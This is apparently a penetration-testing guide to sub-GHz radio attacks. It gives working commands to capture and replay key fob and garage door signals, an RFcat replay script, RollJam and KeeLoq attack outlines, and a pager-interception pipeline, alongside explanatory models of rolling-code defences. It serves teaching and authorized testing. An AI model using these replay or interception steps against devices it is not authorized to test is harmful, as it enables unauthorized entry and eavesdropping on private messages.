SDR Wireless Attacks
# Overview
Software Defined Radio (SDR) enables pentesters to monitor, analyze, and replay radio signals across a wide range of frequencies. Sub-GHz ISM bands are used by key fobs, garage doors, weather stations, industrial sensors, and IoT devices. These devices often use simple modulation (OOK, ASK, FSK) with no encryption or replay protection, making them vulnerable to capture-replay attacks.
# SDR Hardware
| Device | Frequency Range | Sample Rate | Cost | Best For |
|---|---|---|---|---|
| RTL-SDR v4 | 24 MHz – 1.7 GHz | 2.4 MSPS | $35 | Reception only, learning |
| HackRF One | 1 MHz – 6 GHz | 20 MSPS | $300 | Capture + transmit |
| YardStick One | 300-348, 387-464, 779-928 MHz | 2 MSPS | $100 | Sub-GHz attacks |
| Flipper Zero | 300-348, 387-464, 779-928 MHz | 2 MSPS | $169 | Sub-GHz capture + replay |
| USRP B210 | 70 MHz – 6 GHz | 61.44 MSPS | $1,200 | Professional SDR |
# Attack Decision Tree

```text
Sub-GHz target identified?
|
|-- Fixed code (no rolling code)
|   |-- Capture and replay directly
|   |-- Key fob cloning
|   |-- Garage door opening
|
|-- Rolling code (KeeLoq, etc.)
|   |-- RollJam attack (capture, block, replay)
|   |-- KeeLoq cryptanalysis
|   |-- Manufacturer default codes
|
|-- Unknown protocol
|   |-- Frequency identification (RTL-SDR)
|   |-- Modulation analysis (SDR waterfall)
|   |-- Protocol reverse engineering (Universal Radio Hacker)
|
|-- OOK/ASK modulation
    |-- Simple capture + replay
    |-- Sub-GHz subcarrier analysis
```
# Step 1: Frequency Identification

```bash
# RTL-SDR frequency scanning
# Scan 300-928 MHz for active signals (1 MHz bins, 10 s integration, stop after 60 s)
rtl_power -f 300M:928M:1M -g 40 -i 10 -e 60 scan.csv

# List the active frequencies found in the scan output
# Install: pip install numpy scipy
python3 << 'EOF'
import csv
import numpy as np
from scipy.signal import find_peaks

# rtl_power CSV rows: date, time, Hz low, Hz high, Hz step, samples, dB, dB, ...
# Each row holds one bin per dB value; expand them into (frequency, power) pairs.
freqs, power = [], []
with open('scan.csv') as f:
    for row in csv.reader(f):
        low, step = float(row[2]), float(row[4])
        for i, db in enumerate(row[6:]):
            freqs.append(low + i * step)
            power.append(float(db))
freqs, power = np.array(freqs), np.array(power)

# Find peaks (active frequencies) above -30 dB
peaks, _ = find_peaks(power, height=-30)
for peak in peaks:
    print(f"Active frequency: {freqs[peak]/1e6:.3f} MHz, Power: {power[peak]:.1f} dB")
EOF

# Common frequency bands:
# 315 MHz - Key fobs (Asia, US)
# 390 MHz - Garage doors (US)
# 433.92 MHz - IoT sensors, weather stations (EU, worldwide)
# 868 MHz - Z-Wave (EU)
# 915 MHz - IoT, Z-Wave (US)
```
# Step 2: Signal Capture

## RTL-SDR Capture (Reception Only)

```bash
# Capture raw I/Q data at 433.92 MHz (common IoT frequency); -n is the sample count
rtl_sdr -f 433920000 -s 2048000 -g 40 -n 12000000 capture_433.raw

# Capture with automatic gain
rtl_sdr -f 433920000 -s 2048000 -n 12000000 capture_433.raw

# Stream to file for live analysis
# rtl_sdr emits unsigned 8-bit interleaved I/Q, so tell sox the correct encoding
rtl_sdr -f 433920000 -s 2048000 - | sox -t raw -r 2048000 -e unsigned -b 8 -c 2 - capture_433.wav
```
## HackRF Capture (Transmit + Receive)

```bash
# Capture at 433.92 MHz (frequency is given in Hz: 433920000, not 4339200000)
hackrf_transfer -r capture_433.raw -f 433920000 -s 20000000 -l 32 -g 30

# Transmit captured signal
hackrf_transfer -t capture_433.raw -f 433920000 -s 20000000 -x 30

# Capture at 315 MHz (key fobs)
hackrf_transfer -r capture_315.raw -f 315000000 -s 20000000 -l 32 -g 30

# Transmit at 315 MHz
hackrf_transfer -t capture_315.raw -f 315000000 -s 20000000 -x 30
```
## Flipper Zero Capture

```text
On Flipper Zero:
  Sub-GHz → Read → 433.92 MHz (or scan frequency)
  Press the button on the key fob while Flipper Zero is reading
  Save the captured signal

To replay:
  Sub-GHz → Saved → Select signal → Emulate → Press Send
```
# Step 3: Protocol Analysis

## Using Universal Radio Hacker (URH)

```bash
# Install URH
pip install urh

# Launch URH
urh

# Workflow:
# 1. File → Open → Load captured .raw or .cap file
# 2. Set center frequency and sample rate
# 3. View signal in time and frequency domain
# 4. Use "Auto-detect modulation" to identify OOK/ASK/FSK
# 5. Use "Demodulate" to extract bits
# 6. Use "Analyze" to identify protocol fields
# 7. Use "Generate" to create modified signals
# 8. Use "Send" to transmit (requires HackRF or compatible SDR)
```
## Common Sub-GHz Protocols
| Protocol | Frequency | Modulation | Security |
|---|---|---|---|
| PT2262/2272 | 433.92 MHz | OOK | None (fixed code) |
| EV1527 | 433.92 MHz | OOK | None (fixed code) |
| Keeloq | 433.92 MHz | OOK | Rolling code |
| CAME | 433.92 MHz | OOK | Fixed or rolling |
| Nice FLO | 433.92 MHz | OOK | Rolling code |
| Chamberlain | 315/390 MHz | OOK | Rolling code |
| Texas Instruments | 315 MHz | ASK | Varies |
| Generic IoT | 433.92 MHz | OOK/FSK | Usually none |
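What the "Demodulate" step does for the OOK protocols in the table above, shown as an added Python example that is not part of this page or of URH: the envelope of the I/Q samples is thresholded, HIGH runs are measured, and each pulse width maps to a bit. The pulse-width scheme (short pulse = 0, long pulse = 1, 3:1 ratio) and the sample rate are assumptions; `make_ook_pwm` only produces constructed test input so the decoder can run offline. Decoding two "presses" of the same fixed-code frame yields identical bits, which is exactly why those protocols have no replay protection.

```python
import numpy as np


def make_ook_pwm(bits, sample_rate, short_us, long_us, noise=0.05, seed=1):
    """Constructed test input only: baseband I/Q of a pulse-width-coded OOK frame.
    Each bit is a HIGH pulse (short for 0, long for 1) followed by a short LOW gap."""
    rng = np.random.default_rng(seed)
    short_n = int(short_us * sample_rate / 1e6)
    long_n = int(long_us * sample_rate / 1e6)
    parts = [np.zeros(short_n)]                      # leading silence
    for b in bits:
        parts.append(np.ones(long_n if b else short_n))
        parts.append(np.zeros(short_n))
    env = np.concatenate(parts)
    iq = env * np.exp(1j * 0.3)                      # constant carrier phase at baseband
    iq = iq + noise * (rng.standard_normal(env.size) + 1j * rng.standard_normal(env.size))
    return iq


def run_lengths(levels):
    """Run-length encode a boolean array into (level, length) pairs."""
    runs = []
    if levels.size == 0:
        return runs
    change = np.flatnonzero(np.diff(levels.astype(np.int8))) + 1
    starts = np.concatenate(([0], change))
    ends = np.concatenate((change, [levels.size]))
    for s, e in zip(starts, ends):
        runs.append((bool(levels[s]), int(e - s)))
    return runs


def demod_ook_pwm(iq, sample_rate, short_us, long_us):
    """Recover bits: envelope -> threshold at half the peak -> HIGH run lengths ->
    short pulse = 0, long pulse = 1. HIGH runs shorter than half a short pulse are
    treated as noise glitches and dropped."""
    env = np.abs(np.asarray(iq))
    thr = env.max() / 2
    short_n = short_us * sample_rate / 1e6
    long_n = long_us * sample_rate / 1e6
    mid = (short_n + long_n) / 2
    bits = []
    for level, length in run_lengths(env > thr):
        if not level or length < short_n / 2:
            continue
        bits.append(1 if length > mid else 0)
    return bits


def bits_to_int(bits):
    """Pack the decoded bit list into an integer, MSB first."""
    return int("".join(str(b) for b in bits), 2) if bits else 0


if __name__ == "__main__":
    fs = 1_000_000                                   # assumed sample rate, 1 MSPS
    frame = [1, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0]     # constructed fixed-code payload
    press1 = demod_ook_pwm(make_ook_pwm(frame, fs, 350, 1050, seed=1), fs, 350, 1050)
    press2 = demod_ook_pwm(make_ook_pwm(frame, fs, 350, 1050, seed=2), fs, 350, 1050)
    print(press1, hex(bits_to_int(press1)), "identical across presses:", press1 == press2)
```

The threshold at half the peak works for a clean OOK capture; a real recording with a strong nearby transmitter may need a noise-floor estimate instead, and the pulse timings must be read off the URH time-domain view before decoding.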
# Step 4: Replay Attacks

## Fixed Code Replay (Most IoT Devices)

Fixed-code devices transmit the same code every time a button is pressed. Capturing and replaying the signal opens/closes the device.

```bash
# Method 1: HackRF replay
# Capture the signal (see Step 2), then replay (frequency in Hz):
hackrf_transfer -t capture_433.raw -f 433920000 -s 20000000 -x 30

# Method 2: YardStick One (sub-GHz only)
# Using RFcat (rflib); the payload must be the bytes demodulated in Step 3
python3 << 'EOF'
from rflib import RfCat, MOD_ASK_OOK

d = RfCat()
d.setFreq(433920000)            # 433.92 MHz
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(2400)             # symbol rate: set to the rate measured in URH
d.makePktFLEN(32)               # fixed packet length: adjust to captured packet length

# Placeholder file holding the demodulated packet bytes from Step 3
with open('captured_packet.bin', 'rb') as f:
    captured_signal_bytes = f.read()
d.RFxmit(captured_signal_bytes)
EOF

# Method 3: Flipper Zero
# Sub-GHz → Read → Capture signal → Save → Emulate → Send
```
## RollJam Attack (Rolling Code Devices)

Rolling code devices (garage doors, car key fobs) use a counter that increments with each press, preventing simple replay. The RollJam attack captures a code, blocks it from reaching the receiver, then uses it later.

RollJam attack sequence:

1. Attacker jams the receiver frequency
2. Victim presses key fob (code A transmitted)
3. Attacker captures code A (blocked from receiver)
4. Attacker transmits code A to jam while capturing the next code
5. Victim presses key fob again (code B transmitted)
6. Attacker captures code B (blocked from receiver)
7. Attacker replays code A → receiver opens (code A is the "next valid" code)
8. Attacker has code B saved for later use

```text
RollJam is a theoretical attack that requires:
  1. Simultaneous jamming + receiving on adjacent frequencies
  2. Very precise timing
  3. Deep knowledge of the specific rolling code protocol

Tools for RollJam research:
  - HackRF One (dual-channel jam + receive)
  - Custom firmware for simultaneous TX/RX
  - Protocol-specific decoders (KeeLoq, Chamberlain, etc.)

Practical RollJam is extremely difficult and rarely executed.
Most real-world attacks use:
  - Manufacturer default codes
  - KGB/KeeLoq master keys
  - Cloned key fobs (for fixed code systems)
```
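Why a counter-window receiver stops a plain replay but not the withheld-frame sequence above, and what a receiver-issued challenge adds, as an added Python model that is not from this page or from any vendor's implementation. The truncated-HMAC tag stands in for the encoder cipher (real systems use KeeLoq or similar), and the 16-code window, key and serial are constructed assumptions; no radio is involved, only the receiver's acceptance logic.

```python
import hmac
import hashlib


def tag(key, *fields):
    """Constructed stand-in for the encoder cipher: a truncated HMAC over the frame fields."""
    msg = b"".join(int(f).to_bytes(4, "big") for f in fields)
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


class Fob:
    """Transmitter side: serial, incrementing counter, authentication tag."""
    def __init__(self, key, serial):
        self.key, self.serial, self.counter = key, serial, 0

    def press(self, nonce=0):
        self.counter += 1
        return (self.serial, self.counter, nonce,
                tag(self.key, self.serial, self.counter, nonce))


class FixedCodeReceiver:
    """PT2262/EV1527 style: the frame is a constant, so any copy of it is valid."""
    def __init__(self, code):
        self.code = code

    def accept(self, frame):
        return frame == self.code


class RollingCodeReceiver:
    """Counter-window receiver (simplified model): a frame is valid if its tag checks
    and its counter lies within WINDOW codes ahead of the last accepted counter."""
    WINDOW = 16                       # assumed window size

    def __init__(self, key, serial):
        self.key, self.serial, self.last = key, serial, 0

    def accept(self, frame):
        serial, counter, nonce, mac = frame
        if serial != self.serial:
            return False
        if not hmac.compare_digest(mac, tag(self.key, serial, counter, nonce)):
            return False
        if not (self.last < counter <= self.last + self.WINDOW):
            return False              # old, already used, or too far ahead
        self.last = counter
        return True


class ChallengeResponseReceiver(RollingCodeReceiver):
    """Mitigation: the receiver issues a single-use nonce that the fob must include
    under its tag. This needs a two-way link, which one-way fobs do not have."""
    def __init__(self, key, serial):
        super().__init__(key, serial)
        self.nonce, self._next = None, 0

    def challenge(self):
        self._next += 1               # sequential here; random in a real design
        self.nonce = self._next
        return self.nonce

    def accept(self, frame):
        expected, self.nonce = self.nonce, None      # each nonce is consumed on use
        if expected is None or frame[2] != expected:
            return False
        return super().accept(frame)


KEY, SERIAL = bytes(range(16)), 0x1234               # constructed key material


def fixed_code_replay():
    rx = FixedCodeReceiver(0xA5C3)
    captured = 0xA5C3                 # the identical frame appears on every press
    return rx.accept(captured)        # True: nothing distinguishes a copy


def rolling_code_replay():
    fob, rx = Fob(KEY, SERIAL), RollingCodeReceiver(KEY, SERIAL)
    captured = fob.press()
    rx.accept(captured)               # legitimate press reaches the receiver
    return rx.accept(captured)        # False: that counter is already consumed


def rolling_code_withheld_frame():
    """The sequence from the RollJam section: frame A never reached the receiver,
    so its counter still lies inside the window when it is finally delivered."""
    fob, rx = Fob(KEY, SERIAL), RollingCodeReceiver(KEY, SERIAL)
    frame_a = fob.press()             # blocked from the receiver
    frame_b = fob.press()             # also blocked; A is delivered instead
    return rx.accept(frame_a), rx.accept(frame_b)    # (True, True)


def challenge_response_legitimate():
    fob, rx = Fob(KEY, SERIAL), ChallengeResponseReceiver(KEY, SERIAL)
    return rx.accept(fob.press(rx.challenge()))      # True: normal use still works


def challenge_response_withheld_frame():
    """Same sequence against the challenge receiver: each withheld frame answers a
    nonce that has already been replaced by the time the frame is delivered."""
    fob, rx = Fob(KEY, SERIAL), ChallengeResponseReceiver(KEY, SERIAL)
    frame_a = fob.press(rx.challenge())   # answers nonce 1, blocked
    frame_b = fob.press(rx.challenge())   # answers nonce 2, blocked
    late_a = rx.accept(frame_a)           # nonce 2 outstanding, frame carries 1
    rx.challenge()
    late_b = rx.accept(frame_b)           # nonce 3 outstanding, frame carries 2
    return late_a, late_b                 # (False, False)
```

The model makes the design point explicit: a counter window only proves a frame is newer than the last one the receiver saw, not that it is fresh, so any receiver that cannot talk back to the fob has to rely on the attacker being unable to withhold frames. Logging rejected counters and out-of-window jumps is cheap detection for the one-way case.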
## KeeLoq Cryptanalysis

```text
KeeLoq is used by many garage door and key fob manufacturers.
Cryptanalysis has been demonstrated (Bogdanov 2007, Indesteege 2008).

Some KeeLoq implementations use manufacturer keys that can be extracted:
  - Slide-in encoder: fixed manufacturer key + device serial
  - Normal encoder: unique device key derived from manufacturer key

KeeLoq decryption key recovery tools:
  - keeloq_crack (educational)
  - Custom implementations based on published papers

Practical attack:
  1. Capture 2^16 (65536) rolling code pairs from the same device
  2. Use slide attack to recover manufacturer key
  3. Generate valid rolling codes for any device using that manufacturer key

This is a research-level attack, not a practical pentest technique.
```
# Step 5: Key Fob and Garage Door Analysis

## Key Fob Capture

```bash
# Capture key fob signals at 315 MHz (US) or 433.92 MHz (EU)
rtl_sdr -f 315000000 -s 2048000 -g 40 -n 2000000 keyfob_315.raw

# Or at 433.92 MHz
rtl_sdr -f 433920000 -s 2048000 -g 40 -n 2000000 keyfob_433.raw

# Analyze in URH:
# 1. Open keyfob_315.raw in URH
# 2. Identify modulation (usually OOK)
# 3. Demodulate to extract bits
# 4. Identify protocol (PT2262, EV1527, KeeLoq, etc.)
# 5. Extract fixed code or rolling code
```
## Garage Door Analysis

```bash
# Common garage door frequencies:
# US: 315 MHz, 390 MHz
# EU: 433.92 MHz, 868 MHz

# Capture garage door remote signal
rtl_sdr -f 390000000 -s 2048000 -g 40 -n 2000000 garage.raw

# Identify the protocol:
# - Chamberlain: Rolling code, 390 MHz
# - LiftMaster: Rolling code, 315/390 MHz
# - CAME: Fixed or rolling, 433.92 MHz
# - Nice FLO: Rolling code, 433.92 MHz

# For fixed code systems, replay directly
# For rolling code systems, see RollJam above
```
# Pager / POCSAG Interception

```bash
# POCSAG (Post Office Code Standards Advisory Group) pagers
# Operate at 152 MHz, 157 MHz, 454 MHz

# Capture POCSAG pager traffic
rtl_sdr -f 152000000 -s 2048000 -g 40 -n 6000000 pagers.raw

# Decode with multimon-ng
sudo apt install multimon-ng
rtl_fm -f 152.0M -s 22050 -g 40 - | multimon-ng -t raw -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha -

# POCSAG messages contain:
# - Pager address (RIC)
# - Message type (numeric, alpha, tone)
# - Message content (may contain sensitive information)
```
# Regulatory and Safety Considerations
- Transmitting on ISM bands: Legal in most countries for licensed ham radio operators. Unlicensed transmission may violate local regulations.
- Key fob cloning: May be illegal under local laws. Only test on devices you own or have explicit authorization to test.
- Garage doors: Testing may trigger the door or alarm. Inform the property owner.
- Medical devices: NEVER test SDR attacks on medical devices (insulin pumps, pacemakers) without explicit written authorization.
- Automotive key fobs: Many jurisdictions have laws against intercepting and replaying automotive key fob signals.
# Common Pitfalls
- Frequency mismatch: Ensure you're on the correct frequency for your region (US vs EU).
- Sample rate too low: Sub-GHz devices often use low baud rates. Set the SDR sample rate high enough to capture the full signal.
- Antenna mismatch: Use the correct antenna for the frequency (315 MHz antenna for 315 MHz, etc.).
- HackRF TX/RX switching: HackRF cannot transmit and receive simultaneously. Use separate SDRs for RollJam.
- Flipper Zero limitations: The Flipper Zero has limited frequency range and power. It works well for common sub-GHz protocols but can't handle more complex modulation schemes.
# OPSEC Considerations
- SDR transmissions are visible to anyone monitoring the frequency
- Key fob and garage door signals are unencrypted and can be captured by anyone in range
- Replay attacks may trigger alarms or log events on the target device
- Always verify scope explicitly covers SDR and sub-GHz testing
# Cross-References
- Bluetooth Attacks — Another short-range wireless protocol
- Zigbee/Z-Wave Attacks — IoT wireless protocols that use sub-GHz frequencies
- MAC Filtering Bypass — Bypassing MAC filtering on wireless networks
# Tool References
| Tool | Purpose | Link |
|---|---|---|
| RTL-SDR | Low-cost SDR reception | https://www.rtl-sdr.com/ |
| HackRF One | SDR transceiver | https://greatscottgadgets.com/hackrf/ |
| YardStick One | Sub-GHz radio tool | https://greatscottgadgets.com/yardstickone/ |
| Flipper Zero | Multi-protocol sub-GHz tool | https://flipperzero.one/ |
| Universal Radio Hacker | Protocol analysis | https://github.com/jopohl/urh |
| RFcat | Sub-GHz radio control | https://github.com/atlas0fd00m/rfcat |
| multimon-ng | POCSAG/pager decoding | https://github.com/EliasOenal/multimon-ng |
| GQRX | SDR receiver GUI | https://gqrx.dk/ |
| SDR# (SDRSharp) | Windows SDR receiver | https://airspy.com/download/ |